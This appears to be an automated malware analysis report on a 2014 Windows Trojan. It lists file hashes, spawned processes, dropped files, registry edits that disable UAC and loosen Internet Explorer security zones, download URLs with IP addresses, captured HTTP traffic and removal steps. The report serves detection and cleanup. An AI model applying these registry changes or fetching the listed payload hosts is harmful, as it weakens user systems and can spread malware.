Trojan.GenericKD.1950538_fc6542e338

by malwarelabrobot on November 7th, 2014 in Malware Descriptions.

Trojan.Win32.Vobfus.yzq (Kaspersky), Artemis!FC6542E3382C (McAfee), Downloader.Generic14.DXH (AVG), Trojan.GenericKD.1950538 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: fc6542e3382c7fbd08c8770bdba9ff46
SHA1: d1f2ff09bcb5c21431989fa7995f2f16e4aa7449
SHA256: 18cd2d3ec57ba850fc847eed209f3cc2f30cd50d7e62777d910ca3752239e6d1
SSDeep: 6144:Vbhwr9IHvsq1FQnWc0BSjwtFDxxyVkIWFrBrh4lTi/0Q9Op9f22222222222222P:3q9QdQnmHPKVtWFrBlqTi/v9o9
Size: 387584 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPXv0896v102v105v122Delphistub, UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-29 22:57:31
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ping.exe:740
ping.exe:1700
ping.exe:372
ping.exe:204
ping.exe:596
ping.exe:1772
ping.exe:1724
ping.exe:1156
ping.exe:1308
ping.exe:1844
ping.exe:1252
ping.exe:644
ping.exe:1352
ping.exe:824
ping.exe:504
ping.exe:1516
ping.exe:500
wscript.exe:472

The Trojan injects its code into the following process(es):

%original file name%.exe:656

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process %original file name%.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif (192769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\wg.gif (193177 bytes)
%Documents and Settings%\All Users\winSupport.vbs (21242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\nmscrp[1].gif (20929 bytes)

Registry activity

The process ping.exe:740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 01 47 09 F5 1E A1 DF 6A 27 8F 02 6D E4 A4 1D"

The process ping.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 15 A7 26 92 6E 46 54 B6 E8 08 F7 D4 17 AA C2"

The process ping.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 56 4C 6E 4B 66 2F 10 E8 84 45 A0 17 70 4E C5"

The process ping.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 F0 55 A1 10 67 1E 48 FE 62 DA 69 3D 97 4E 51"

The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 13 59 24 47 6C 23 8A C4 66 44 9B CB D2 2C 64"

The process ping.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0C 73 FA DE 3D 73 19 A5 B9 B9 21 60 46 72 F1"

The process ping.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 65 55 69 C8 1E 1C D5 C5 74 C5 E0 6F 86 2E B5"

The process ping.exe:1156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 7A F7 E5 5B D8 1F DE 5D 13 51 78 E6 ED 2A CC"

The process ping.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F A6 19 4A E2 15 C4 85 27 B9 1E C7 E3 47 99 2A"

The process ping.exe:1844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 77 D3 1E 49 0C 01 DD 1D AE 2C 0B C2 1C E2 3E"

The process ping.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B C2 76 2D 6A 31 3C 45 A3 82 65 AF 9A C1 2B 8D"

The process ping.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 4E D0 F0 41 6C A4 EB 49 15 1A F6 61 EC 3E B1"

The process ping.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 1A E7 9E EC 6F F2 F9 C0 39 43 DA 2B 8C EC A7"

The process ping.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 C6 87 F6 3F CF 15 F3 78 3E 6B EB DC 17 19 A0"

The process ping.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 8B FA 4C E9 6D 23 AB 2B 13 27 90 4C 78 44 63"

The process ping.exe:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 44 52 6F EF 5D A6 A9 C3 C3 04 DE 66 F7 FC 43"

The process ping.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 88 12 F3 A4 69 D0 A5 83 5F E5 C9 F0 A9 4F 64"

The process %original file name%.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D A1 84 1B 83 F3 F8 BA A7 28 15 1E 2E C1 69 66"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wscript.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 99 6E 18 BC 5A D9 CC 24 E0 45 43 6B 05 60 F8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"ping.exe" = "TCP/IP Ping Command"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Dropped PE files

MD5 File path
bd126a7b59d5d1f97ba89a3e71425731 c:\Documents and Settings\All Users\wg.exe
bd126a7b59d5d1f97ba89a3e71425731 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 692224 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 696320 360448 358400 5.49912 6f5865be7c63fde9e731913664a4d726
.rsrc 1056768 28672 28160 2.16278 7318a03e397bed08221620b5dd6d694d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://an.babalucat.com/nmscrp.gif 146.0.79.195
hxxp://www.reformapolitica.org.br/plugins/docman/wg.gif 64.90.50.156


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /plugins/docman/wg.gif HTTP/1.1
User-Agent: hXXp://VVV.reformapolitica.org.br/plugins/docman/wg.gif
Host: VVV.reformapolitica.org.br


HTTP/1.1 200 OK
Date: Thu, 06 Nov 2014 10:21:49 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2014 03:20:41 GMT
ETag: "62000-5049055923440"
Accept-Ranges: bytes
Content-Length: 401408
Content-Type: image/gif

<<< skipped >>>

GET /nmscrp.gif HTTP/1.1
User-Agent: hXXp://an.babalucat.com/nmscrp.gif
Host: an.babalucat.com


HTTP/1.1 200 OK
Date: Thu, 06 Nov 2014 10:21:48 GMT
Server: Apache/2.2.27 (Unix) PHP/5.5.11
Last-Modified: Fri, 31 Oct 2014 20:02:51 GMT
ETag: "27f2c-a161-506bd7b54bea0"
Accept-Ranges: bytes
Content-Length: 41313
Content-Type: image/gif

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_656:


%original file name%.exe_656_rwx_00401000_00100000:

Operation not supported
External exception %x
0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

wscript.exe_472:


ping.exe_1840:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ping.exe:740
    ping.exe:1700
    ping.exe:372
    ping.exe:204
    ping.exe:596
    ping.exe:1772
    ping.exe:1724
    ping.exe:1156
    ping.exe:1308
    ping.exe:1844
    ping.exe:1252
    ping.exe:644
    ping.exe:1352
    ping.exe:824
    ping.exe:504
    ping.exe:1516
    ping.exe:500
    wscript.exe:472

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif (192769 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\wg.gif (193177 bytes)
    %Documents and Settings%\All Users\winSupport.vbs (21242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\nmscrp[1].gif (20929 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
